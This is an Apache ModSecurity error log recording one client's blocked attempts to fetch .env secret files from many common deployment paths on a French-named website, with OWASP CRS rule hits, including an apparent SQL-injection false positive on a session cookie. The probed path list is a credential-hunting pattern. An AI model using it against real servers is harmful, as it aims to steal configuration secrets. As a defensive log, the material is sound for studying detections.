[Mon May 11 16:33:30.823881 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/storage/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NgAAAQs"]
[Mon May 11 16:33:30.824279 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/storage/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NgAAAQs"]
[Mon May 11 16:33:30.824469 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/storage/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NgAAAQs"]
[Mon May 11 16:33:30.824709 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/storage/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NgAAAQs"]
[Mon May 11 16:33:30.981203 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/var/www/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NwAAAQs"]
[Mon May 11 16:33:30.981542 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/var/www/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NwAAAQs"]
[Mon May 11 16:33:30.981715 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/var/www/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NwAAAQs"]
[Mon May 11 16:33:30.981938 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/var/www/.env"] [unique_id "agHoukWKUxpmnkK7zHx_NwAAAQs"]
[Mon May 11 16:33:31.138212 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/var/www/html/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OAAAAQs"]
[Mon May 11 16:33:31.138599 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/var/www/html/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OAAAAQs"]
[Mon May 11 16:33:31.138784 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/var/www/html/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OAAAAQs"]
[Mon May 11 16:33:31.139020 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/var/www/html/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OAAAAQs"]
[Mon May 11 16:33:31.297704 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/current/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OgAAAQs"]
[Mon May 11 16:33:31.298077 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/current/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OgAAAQs"]
[Mon May 11 16:33:31.298295 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/current/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OgAAAQs"]
[Mon May 11 16:33:31.298549 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/current/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OgAAAQs"]
[Mon May 11 16:33:31.457491 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/release/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OwAAAQs"]
[Mon May 11 16:33:31.457930 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/release/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OwAAAQs"]
[Mon May 11 16:33:31.458120 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/release/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OwAAAQs"]
[Mon May 11 16:33:31.458388 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/release/.env"] [unique_id "agHou0WKUxpmnkK7zHx_OwAAAQs"]
[Mon May 11 16:33:31.615772 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/releases/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PAAAAQs"]
[Mon May 11 16:33:31.616271 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/releases/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PAAAAQs"]
[Mon May 11 16:33:31.616596 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/releases/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PAAAAQs"]
[Mon May 11 16:33:31.617001 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/releases/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PAAAAQs"]
[Mon May 11 16:33:31.773261 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/shared/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PgAAAQs"]
[Mon May 11 16:33:31.773825 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/shared/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PgAAAQs"]
[Mon May 11 16:33:31.774072 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/shared/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PgAAAQs"]
[Mon May 11 16:33:31.774347 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/shared/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PgAAAQs"]
[Mon May 11 16:33:31.937373 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/deploy/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PwAAAQs"]
[Mon May 11 16:33:31.937749 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/deploy/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PwAAAQs"]
[Mon May 11 16:33:31.937938 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/deploy/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PwAAAQs"]
[Mon May 11 16:33:31.938196 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/deploy/.env"] [unique_id "agHou0WKUxpmnkK7zHx_PwAAAQs"]
[Mon May 11 16:33:32.096163 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/build/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QAAAAQs"]
[Mon May 11 16:33:32.096553 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/build/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QAAAAQs"]
[Mon May 11 16:33:32.096741 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/build/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QAAAAQs"]
[Mon May 11 16:33:32.096996 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/build/.env"] [unique_id "agHovEWKUxpmnkK7zHx_QAAAAQs"]
